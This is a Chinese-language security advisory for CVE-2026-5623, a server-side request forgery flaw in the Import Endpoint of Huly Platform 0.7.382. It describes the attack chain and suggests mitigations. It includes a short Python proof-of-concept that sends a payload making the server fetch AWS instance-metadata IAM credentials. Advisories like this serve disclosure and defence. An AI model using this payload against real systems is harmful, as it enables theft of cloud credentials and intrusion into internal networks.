CVE-2026-5623 CVSS 6.3 中危

CVE-2026-5623 Huly Platform服务器端请求伪造漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5623

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

hcengineering Huly Platform

漏洞概述

hcengineering Huly Platform 0.7.382版本曝出一处安全漏洞，根源在于Import Endpoint组件的`server/front/src/index.ts`文件处理逻辑不当。由于未对用户输入进行严格过滤，攻击者可利用此缺陷发起服务器端请求伪造（SSRF）攻击。该漏洞攻击复杂度低，无需用户交互即可远程触发。鉴于利用代码已公开且厂商尚未回应，建议用户尽快采取防护措施以避免敏感数据泄露。

技术细节

该漏洞具体存在于hcengineering Huly Platform 0.7.382版本的Import Endpoint组件中，涉及文件路径为`server/front/src/index.ts`。漏洞成因是应用程序在处理导入功能请求时，未能正确验证或净化用户提交的URL参数。这使得经过身份验证的攻击者能够操纵服务器向内部网络地址或任意外部域发送HTTP请求。攻击者可以通过向内网元数据服务（如AWS的169.254.169.254）发送请求，窃取云凭证或敏感配置信息。由于CVSS评分显示攻击无需用户交互且权限要求较低，结合已公开的PoC代码，该漏洞具有被大规模利用的潜在风险，可能导致内部网络被探测或数据泄露。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别出目标正在运行存在漏洞的hcengineering Huly Platform 0.7.382版本，并定位到Import Endpoint接口。

STEP 2

步骤2：构造Payload

攻击者构建包含恶意内网地址（如云元数据服务地址）的请求参数，准备发起SSRF攻击。

STEP 3

步骤3：发送请求

攻击者向受害服务器的`server/front/src/index.ts`接口发送特制的HTTP请求，利用低权限账户即可触发。

STEP 4

步骤4：执行攻击

服务器端解析请求并向攻击者指定的内网地址发送连接请求，获取敏感信息并返回给攻击者，完成数据窃取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target host configuration
target_url = "http://vulnerable-host:8080/api/import"

# Malicious SSRF payload targeting internal metadata service
# Attempting to access AWS instance metadata
ssrf_payload = {
    "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
}

try:
    # Sending the malicious request to the Import Endpoint
    response = requests.post(target_url, json=ssrf_payload, timeout=10)

    # Check if the request indicates a successful SSRF attack
    if response.status_code == 200:
        print("[+] SSRF Exploit Successful!")
        print("Response Content:")
        print(response.text)
    else:
        print(f"[-] Exploit failed, status code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"Error connecting to target: {e}")

影响范围

hcengineering Huly Platform 0.7.382

防御指南

临时缓解措施

如果无法立即升级，建议在WAF或防火墙层面配置规则，拦截发往Import Endpoint的包含内网IP段或非受信域名的请求。同时，应暂时禁用非必要的导入功能，并密切监控服务器的出站流量日志，检测是否存在异常的内部网络访问行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5623
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5623
3 Details https://www.cvedetails.com/cve/CVE-2026-5623/
4 VulDB https://vuldb.com/cve/CVE-2026-5623
5 Link https://vuldb.com/submit/785632
6 Link https://vuldb.com/vuln/355413
7 Link https://vuldb.com/vuln/355413/cti
8 Link https://vuldb.com/submit/785632

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表